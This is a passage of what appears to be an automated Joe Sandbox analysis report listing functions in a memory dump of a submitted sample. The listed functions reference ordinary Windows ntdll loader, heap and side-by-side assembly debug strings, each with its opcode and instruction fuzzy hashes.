SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01071FC9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01071F82
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01071FA9
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01071F8A
SXS: %s() passed the empty activation context, xrefs: 01071F6F

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: c28414ddc68e7b158ad4f5ac44748a31981c58c605e91f0cb4e94d9287a83122
Instruction ID: dcde6977de47ebf4ce74966062e49c66a491013e9094ffbbc99a960f65259df0
Opcode Fuzzy Hash: c28414ddc68e7b158ad4f5ac44748a31981c58c605e91f0cb4e94d9287a83122
Instruction Fuzzy Hash: 94312872F04215BBE721AA9ADC45F9F7AACAFA5B50F144059FA8077281C370EE00D7E5

Function 0103C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 01077F7B
LdrpInitializeProcess, xrefs: 0103C5E4
minkernel\ntdll\ldrinit.c, xrefs: 0103C5E3
LdrpInitializeImportRedirection, xrefs: 01077F82, 01077FF6
minkernel\ntdll\ldrredirect.c, xrefs: 01077F8C, 01078000
Unable to build import redirection Table, Status = 0x%x, xrefs: 01077FF0

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 5b92c9aab379ec98a9f29e3140ad730e8dcf32b1a794152acecbf9835f281b31
Instruction ID: bd93e9094294a9a0722791ab56339338048740fa990559b26ebc31846c5e8a0c
Opcode Fuzzy Hash: 5b92c9aab379ec98a9f29e3140ad730e8dcf32b1a794152acecbf9835f281b31
Instruction Fuzzy Hash: C63113716043429BD224EF28D94AE6ABBD5EFD4B50F04455DF9C4AB391DA20EC04C7A2

Function 01020AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01020BFC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01069F2E
LdrpCheckModule, xrefs: 01069F24
Failed to allocated memory for shimmed module list, xrefs: 01069F1C

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: db1690bd0d2563f68c5b00a4f2444f84d3f417a65b30d96e1a047529b8907653
Instruction ID: 9fe981095a2aae43f7356aaac9a82df882420607992fc7fdc057469edecc64c0
Opcode Fuzzy Hash: db1690bd0d2563f68c5b00a4f2444f84d3f417a65b30d96e1a047529b8907653
Instruction Fuzzy Hash: 8F710570A00205DFDB25DF68C885ABEB7F4FB44708F1444ADE582EBA59E735AD41CB50

Function 0103C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0103C6DF

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 010780E9
Failed to reallocate the system dirs string !, xrefs: 010780E2
minkernel\ntdll\ldrinit.c, xrefs: 010780F3

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 8cbde120d5cd7f22fd9084132a1068d286d4d42e049f613e602bd84dcec31307
Instruction ID: 4c4b0c3459412b90b03437bd5a1e91f22c5a145363e6e41aaab4fbb668efbafa
Opcode Fuzzy Hash: 8cbde120d5cd7f22fd9084132a1068d286d4d42e049f613e602bd84dcec31307
Instruction Fuzzy Hash: 0941F271504301ABD721EB68ED45B9B77E8EF88750F00482EB9C8E7291EB79E800DB91

Function 010843D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01084489

Strings

LdrpCheckRedirection, xrefs: 0108450F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01084508
minkernel\ntdll\ldrredirect.c, xrefs: 01084519

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 2e37283ade621852e68670a06224dead82be7a753f84f0008a15cf300555a536
Instruction ID: 9fbb452a68b08f959c6d7e189bdf6bfc90d093562b7c89dccdafda3718cb1d2c
Opcode Fuzzy Hash: 2e37283ade621852e68670a06224dead82be7a753f84f0008a15cf300555a536
Instruction Fuzzy Hash: 9841C1326093129BCB61EF5CD840B667BE5BF48750B0A169EEDD8D7356EB31E800CB91

Function 01084BC0 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

\microsoft.system.package.metadata\Application, xrefs: 01084DD8
.Local, xrefs: 01084DF0
\, xrefs: 01084BE6
.DLL, xrefs: 01084D47, 01084E1C
/, xrefs: 01084BED

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: 4cf81f132fd90ad439b5135527b9dc54d202e88e06a7e8f5b3cdf7e0aee75388
Instruction ID: a31e545f2c048c347d6a4b872f5c310d30cb8fef0206f39ad84b5280e83d9e99
Opcode Fuzzy Hash: 4cf81f132fd90ad439b5135527b9dc54d202e88e06a7e8f5b3cdf7e0aee75388
Instruction Fuzzy Hash: 3B91C372D0462A8BCB61EF9CC8816AEB7F4FF48314F1941AAE895EB350D775D901CB90

Function 01034B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 01034BE3
Flst, xrefs: 01034BB6

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: ef6a286ba5d405ada4379a289ffdec97fc26002d5e1e472005de556665839f74
Instruction ID: 027d7c023ed73610332c130712fcfdde776bac16a75a7431d8c8dacb6465bdb5
Opcode Fuzzy Hash: ef6a286ba5d405ada4379a289ffdec97fc26002d5e1e472005de556665839f74
Instruction Fuzzy Hash: 4A5147B1E102488FDBA6CF99C4846A9FBF8FB84715F14C4AAD085DF255E7B19981CB80

Function 01000485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010005D6

Strings

kLsE, xrefs: 010005FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01000586

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 40400590b830fcf6ea092aaf4597d3cb5814a41511b5b76be617091bd0e8c89c
Instruction ID: 2b45988b2384a8f7018a874c9df77eabd5008758e84ce4aef33f10724c342d1f
Opcode Fuzzy Hash: 40400590b830fcf6ea092aaf4597d3cb5814a41511b5b76be617091bd0e8c89c
Instruction Fuzzy Hash: 0151AD71A007469FEB66DFA8C4407EBB7F4AF44341F10847EE6DA83285E7769604CB61

Function 0101A760 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01067B63
SsHd, xrefs: 0101A7A5
SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01067B46
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01067B10

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: 2ef3c712971ce8437896c4ec03d85fe22c7202c20a7ceaa1b931b948419e0db4
Instruction ID: ee55d2bc0d288b19c59e343681a962b4858228f87ed933a2a8116c38125ffb02
Opcode Fuzzy Hash: 2ef3c712971ce8437896c4ec03d85fe22c7202c20a7ceaa1b931b948419e0db4
Instruction Fuzzy Hash: 66D1A071A01259DFDF25CF98C8C06ADFBF5FF48314F184099E985AB249D335A981CB91

Function 0100A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0100A317
LdrResFallbackLangList Exit, xrefs: 0100A31F
LdrResFallbackLangList Enter, xrefs: 0100A30F
8, xrefs: 0100A307

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: c85fa4ab4acb887f265bbd23502681c07e2dadedce38cfa221b0c5359c3ec959
Instruction ID: 5fbbb08167236839a83c606e6b512d47cce8ad1663c84e807f55de5dc21b205f
Opcode Fuzzy Hash: c85fa4ab4acb887f265bbd23502681c07e2dadedce38cfa221b0c5359c3ec959
Instruction Fuzzy Hash: 0AC17C75208382CBE722CF18C540BAEB7E4FF84704F048969F9D58B291E774CA45CB56

Function 01038322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 010384B1
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0103847E
LdrpInitializeProcess, xrefs: 01038342
minkernel\ntdll\ldrinit.c, xrefs: 01038341

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 01ebe3d4c344ca29079fee9b7425b18cd7f354d00556bfe4c013d4630d52fafb
Instruction ID: 8b38455ff24eee834f77178c7d69adbbc4c5f28357033fef920738215c34172d
Opcode Fuzzy Hash: 01ebe3d4c344ca29079fee9b7425b18cd7f354d00556bfe4c013d4630d52fafb
Instruction Fuzzy Hash: 12918D71609341AFE721DE64C881FABBBECBB84744F40496EFAC492151E735D904CB62

Function 01010B10 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010652FA
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010653BB
HEAP: , xrefs: 010652ED, 010653AE
HEAP[%wZ]: , xrefs: 010652DE, 0106539F

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 3a20a4a35266c01243ad3a1caaf00d15bc88beabb392a7fff8844b1f8f1d9aad
Instruction ID: a7d84c6f4f642bed6ba48366da5cd359713fc1143bc6372f5331b5981ef5ba22
Opcode Fuzzy Hash: 3a20a4a35266c01243ad3a1caaf00d15bc88beabb392a7fff8844b1f8f1d9aad
Instruction Fuzzy Hash: AAA1F33060070A9BD725DF28C881BBAB7E1FF44704F1485A9F5C68B68ED378E984CB91

Function 0103265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01071FE3, 010720BB
.Local, xrefs: 010327F8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010720C0
SXS: %s() passed the empty activation context, xrefs: 01071FE8

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: b434d32cfc79e23a68f7e9300785e1f1f20d75e701b5258bdd127ebf87f7e607
Instruction ID: e21e7f854ba0eb89ceba6c20955bdbe970749621f557e6118a61ca77fbe9e4b1
Opcode Fuzzy Hash: b434d32cfc79e23a68f7e9300785e1f1f20d75e701b5258bdd127ebf87f7e607
Instruction Fuzzy Hash: 51A1D331D01329DBDB21DF58DC84B99B7B5BF98314F1441EAE988AB252D7309E81CF90

Function 010349F0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 0107322F, 0107323C, 0107325B
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01073234
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01073241
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01073260

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: df676c5903bba211097d6a696619ef4de0979a5a5cd0b1a459d73c9959853268
Instruction ID: 0008ca6539bf6604437283cac2e8d858070252b6c40ef4a99f951f488f507057
Opcode Fuzzy Hash: df676c5903bba211097d6a696619ef4de0979a5a5cd0b1a459d73c9959853268
Instruction Fuzzy Hash: 3D610432A44B029BE766CF19C881B6AB7E8FF84B10F158559E9D5DF281C730E802CB95

Function 010063CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01060DEC
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01060E2F
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01060EB5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01060E72

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: f56d7d8e9db9576a1d83c268943e50e6f264ec0b38befa717ca95ee7a8e5161d
Instruction ID: e504d5c38844ce89d9ae4cd0b4fb38a163cdd2daf247d8868faf1900a04de2da
Opcode Fuzzy Hash: f56d7d8e9db9576a1d83c268943e50e6f264ec0b38befa717ca95ee7a8e5161d
Instruction Fuzzy Hash: 3871F3B19043059FDBA2EF54C884B9B7BEAAF95750F0044A9FDC84B287D735D188CB92

Function 010B0D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 010B0E56
HEAP: , xrefs: 010B0DCA, 010B0DDD, 010B0DDF, 010B0E44
HEAP[%wZ]: , xrefs: 010B0DBD, 010B0E37
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 010B0DE1

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: a20b8e15ac012b70e2c8b845f8366875bbcd627753c30cb809fb57fa8ac3a3ee
Instruction ID: 44fda35d925298ed822b04d638eac03b94bc4ad83d52fc0d9de4f390e7e25f26
Opcode Fuzzy Hash: a20b8e15ac012b70e2c8b845f8366875bbcd627753c30cb809fb57fa8ac3a3ee
Instruction Fuzzy Hash: DB310E31210514EFD361EB68C885FEB77F9EF04B60F18059AF681CB2A5D772E940EA60

Function 00FD99E8 Relevance: 5.0, Strings: 3, Instructions: 1217COMMON

Download Yara Rule

Strings

&, xrefs: 00FD9DA2
&, xrefs: 00FD9CA7
&, xrefs: 00FD9D82

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: &$&$&
API String ID: 0-3101051865
Opcode ID: 2ca4b3e569de89eed8e01905dacd54b56e9f0184cd69a0709c5abde5a0f9923a
Instruction ID: bc3c19f4f5edc32a4cb7cc559836587c254168cda4dd8dc1dd710f64ed65e591
Opcode Fuzzy Hash: 2ca4b3e569de89eed8e01905dacd54b56e9f0184cd69a0709c5abde5a0f9923a
Instruction Fuzzy Hash: A2C2256250D7D64EEB139B34CC58B91BFE1AF07318F9E82DAC0D08E4A3D7A9554AC316

Function 010128C0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0101319D
HEAP: , xrefs: 01013184
HEAP[%wZ]: , xrefs: 01013175

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 86492360e5e622d0c4874e5438d3a3ca8756cf74afcb04653b176bff5adf019b
Instruction ID: 0363cc233cbf86e93b2a2a6de7de5e3ae8a2e276432873ed1b3e31613fa61bd2
Opcode Fuzzy Hash: 86492360e5e622d0c4874e5438d3a3ca8756cf74afcb04653b176bff5adf019b
Instruction Fuzzy Hash: 4C92CE71A04249DFDB25CFA8C4807AEBBF1FF48310F1480A9E999AB395D739A945CF50

Function 010C70F1 Relevance: 4.7, APIs: 3, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010C71CE
RtlDebugPrintTimes.NTDLL ref: 010C7220
RtlDebugPrintTimes.NTDLL ref: 010C7275

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: dc3581de9d41e0519f3ca5e0734cd01511c6c4d1384f71b86703ff86afde0e62
Instruction ID: 45fdbac758f54b09025773dbfd95b4a5f2609e3ed2a65f34b0c37bcfcea1c366
Opcode Fuzzy Hash: dc3581de9d41e0519f3ca5e0734cd01511c6c4d1384f71b86703ff86afde0e62
Instruction Fuzzy Hash: 3051E631A0011A9BDB25DFA8D8446AEBBF6FF88704F04416DED91E7280DB75AE01CF80

Function 0100170C Relevance: 4.3, Strings: 3, Instructions: 520COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0105F6BE
HEAP[%wZ]: , xrefs: 0105F6B1
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0105F6D3

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 2ac4365b82789366c9d86e172484349ad78c526f976a806d477e950c331101f5
Instruction ID: 922bf4f4c429b597ad3f082a6338968bd02621801735d2507134bbe2ea6a4a95
Opcode Fuzzy Hash: 2ac4365b82789366c9d86e172484349ad78c526f976a806d477e950c331101f5
Instruction Fuzzy Hash: 4712D430600656EFEB66CF28C480B7ABBE1FF45304F14859DE9D98B685D774E941CBA0

Function 01001380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010014B6
HEAP[%wZ]: , xrefs: 01001632
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01001648

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
